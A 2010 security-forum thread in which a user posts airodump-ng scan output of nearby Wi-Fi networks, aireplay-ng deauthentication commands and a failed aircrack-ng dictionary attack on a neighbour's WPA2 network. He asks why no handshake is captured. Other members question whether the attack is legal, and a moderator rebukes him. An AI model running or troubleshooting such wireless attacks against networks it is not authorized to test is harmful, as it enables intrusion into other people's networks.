Results 1 to 7 of 7

Thread: No valid WPA handshakes found AND [ 0| 0 ACKs] WHY?

  1. #1
    Just burned his ISO
    Join Date
    Mar 2010
    Posts
    3

    Default No valid WPA handshakes found AND [ 0| 0 ACKs] WHY?

    hello and sorry for disturbing you.I do exacly like in tutorial but....i have some problems and i really need your help.i install backtrack 4 final with vmware on a windows 7 . i don't know why my [ 0| 0 ACKs] its 0/0 and why the WPA dowsn't make a WPA handshakes .SORRY FOR MY ENGLISH..

    This is what i do.
    Code:
    CH 10 ][ Elapsed: 4 s ][ 2010-03-23 21:59
    
     BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
    
    00:24:B2:30:15:3A  -53       61        0    0  11  54e. WPA  TKIP   PSK  SKY94249
    00:1E:2A:18:82:96  -57       36        0    0  11  54e  WPA  TKIP   PSK  Karen
    00:1F:E2:9C:52:20  -58        4        1    0   4  54e  WPA2 CCMP   PSK  Valhalla
    02:24:2B:3F:09:59  -58        2        0    0   7  54e  OPN              BTFON
    00:24:2B:3F:09:57  -58        2        0    0   7  54e  WPA2 CCMP   PSK  BTHomeHub2-4GT3
    00:26:F2:C3:84:F8  -60        2        0    0   6  54 . WPA  TKIP   PSK  virgin broadband10
    00:24:D2:EB:B8:58  -60       57        0    0  11  54   WPA  TKIP   PSK  TalkTalk45488
    00:14:6C:B5:E4:3E  -63        3        1    0   6  54e. WPA  TKIP   PSK  SKY39252
    00:90:D0:4C:BC:69  -64       46        0    0  11  54e  WPA  TKIP   PSK  ana01
    00:21:04:DE:B9:D2  -64        3        0    0   6  54e. WPA2 CCMP   PSK  BTHomeHub2-6FK7
    00:1D:68:6B:EC:AB  -65        2        0    0   6  54   WEP  WEP         O2wirelessA6912F
    00:18:4D:CC:8D:A6  -66       35        0    0  11  54e. WPA  TKIP   PSK  HARINGEY
    00:1B:9E:66:F4:BA  -66        5        0    0   1  54   WEP  WEP         Nova
    00:1F:33:7A:6E:E4  -67       64        1    0  11  54e. WPA  TKIP   PSK  SKY81424
    00:18:4D:3D:FC:D0  -69       24        0    0  11  54e. WPA  TKIP   PSK  SKY77019
    00:1D:68:E3:A0:9B  -58        2        0    0   7  54e  WPA  TKIP   PSK  BTHomeHub-8AE6
    00:24:2C:4E:AD:DB  -61        2        0    0   1  54e  WPA2 CCMP   PSK  BTHomeHub2-HWQ8
    00:16:0A:0D:E7:6C  -67        2        0    0   1  54   WPA  TKIP   PSK  ORION
    00:26:5A:85:C3:F0  -67        2        0    0   1  54e  WPA2 CCMP   PSK  virgin broadband
    
     BSSID              STATION            PWR   Rate    Lost  Packets  Probes
    
     00:90:D0:4C:BC:69  00:1F:3A:6E:1D:3A  -66    0 - 1e     0        3
     00:26:5A:85:C3:F0  00:13:02:85:9C:46   -1    2e- 0      0        1
     00:1F:E2:9C:52:20  00:20:00:14:F8:22   -1    1 - 0      0        1
     00:1F:E2:9C:52:20  00:12:F0:1A:7B:99   -1    1e- 0      0        1
    root@bt:~# aireplay-ng --deauth 1 -a 00:1F:E2:9C:52:20 -c 00:20:00:14:F8:22 mon0
    13:07:54  Waiting for beacon frame (BSSID: 00:1F:E2:9C:52:20) on channel 4
    13:07:54  Sending 64 directed DeAuth. STMAC: [00:20:00:14:F8:22] [ 0| 0 ACKs]
    
    
     CH  4 ][ Elapsed: 2 hours 9 mins ][ 2010-03-24 13:08
    
     BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH E
    
      00:1F:E2:9C:52:20  -55  96    65063     4081    0   4  54e  WPA2 CCMP   PSK  V
    
      BSSID              STATION            PWR   Rate    Lost  Packets  Probes
    
      00:1F:E2:9C:52:20  00:20:00:14:F8:22    0    1 - 1      0   408820
    ^C
    root@bt:~#
    
    root@bt:~# aircrack-ng output-01.cap -w /root/tools/dictionaries/webster-dictionary.txt
    
    
    Opening output-01.cap
    Read 828515 packets.
    
    I really apreciate your help.Tnx in advance
       #  BSSID              ESSID                     Encryption
    
       1  00:1F:E2:9C:52:20  Valhalla                  WPA (0 handshake)
    
    Choosing first network as target.
    
    Opening output-01.cap
    No valid WPA handshakes found..
    
    Quitting aircrack-ng...
    root@bt:~#
    I really apreciate your help.Tnx in advance

  2. #2
    Senior Member hypervista's Avatar
    Join Date
    Feb 2010
    Posts
    121

    Default Re: No valid WPA handshakes found AND [ 0| 0 ACKs] WHY?

    First, I think your problem is you're too far away from your target, which leads me to believe this is NOT your AP and therefore a taboo discussion point here....

  3. #3
    Just burned his ISO
    Join Date
    Mar 2010
    Posts
    3

    Default Re: No valid WPA handshakes found AND [ 0| 0 ACKs] WHY?

    Actualy... that data are because i do something like this for 2h .

    Code:
    root@bt:~# aireplay-ng --deauth 5000 -a 00:1F:E2:9C:52:20 -c 00:20:00:14:F8:22 mon0
    13:07:54  Waiting for beacon frame (BSSID: 00:1F:E2:9C:52:20) on channel 4
    13:07:54  Sending 64 directed DeAuth. STMAC: [00:20:00:14:F8:22] [ 0| 0 ACKs]
    .
    .{and i reply just like this [ 1| 0 ACKs and  [ 0| 1 ACKs] }
    .
    13:07:54  Sending 64 directed DeAuth. STMAC: [00:20:00:14:F8:22] [ 1| 0 ACKs]
    .
    .
    13:07:54  Sending 64 directed DeAuth. STMAC: [00:20:00:14:F8:22] [ 0| 1 ACKs]
    .
    .

  4. #4
    Junior Member Lucifer's Avatar
    Join Date
    Feb 2010
    Posts
    75

    Default Re: No valid WPA handshakes found AND [ 0| 0 ACKs] WHY?

    first of all, make sure not doing anything illigal, 'cause it seems like it..

    if you're not, then maybe because your card can't inject, or you're too far away from the AP.
    try to deauth other clients from a different AP of yours to see if the problem is due to your card or not.

    L

  5. #5
    Junior Member
    Join Date
    Mar 2010
    Posts
    43

    Default Re: No valid WPA handshakes found AND [ 0| 0 ACKs] WHY?

    Think more info would be good, im fairly new to this but my guess would be the wireless card needs the drivers for the injection process

  6. #6
    Just burned his ISO
    Join Date
    Mar 2010
    Posts
    3

    Default Re: No valid WPA handshakes found AND [ 0| 0 ACKs] WHY?

    Yeah..you are right .... that network its not mine, it belong to my friend who leave 1 house away from me and i have his approval(its a bet ) )I don't need wireless internet because i have broadband.
    My wireless card is Realtek RTL8187B Wireless 802.11b/g .


    Hmm you said that the card needs the drivers for the injection process.You lose me on this..

  7. #7
    Super Moderator Archangel-Amael's Avatar
    Join Date
    Jan 2010
    Location
    Somewhere
    Posts
    8,012

    Default Re: No valid WPA handshakes found AND [ 0| 0 ACKs] WHY?

    Quote Originally Posted by Primeraptor View Post
    Yeah..you are right .... that network its not mine, it belong to my friend who leave 1 house away from me and i have his approval(its a bet ) )I don't need wireless internet because i have broadband.
    My wireless card is Realtek RTL8187B Wireless 802.11b/g .


    Hmm you said that the card needs the drivers for the injection process.You lose me on this..


    Well that's too bad for you, moron!
    I tell you what, go tell your neighbor's that you are sorry for trying to break into their network(s).
    I will also send a copy of your contact info and a link of this thread to your ISP.

Similar Threads

  1. Found Weirrd Process Bug
    By SpuTniC in forum BackTrack Bugs
    Replies: 0
    Last Post: 03-07-2010, 01:08 PM
  2. is this a valid handshake?
    By rocco in forum Beginners Forum
    Replies: 4
    Last Post: 02-18-2010, 08:49 PM
  3. Mobility HD 4200 no screens found
    By Synth in forum Beginners Forum
    Replies: 1
    Last Post: 02-14-2010, 02:02 AM
  4. metagoofil.py: command not found
    By calnorak in forum Beginners Forum
    Replies: 2
    Last Post: 02-02-2010, 06:16 PM
  5. Replies: 5
    Last Post: 01-17-2010, 05:30 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •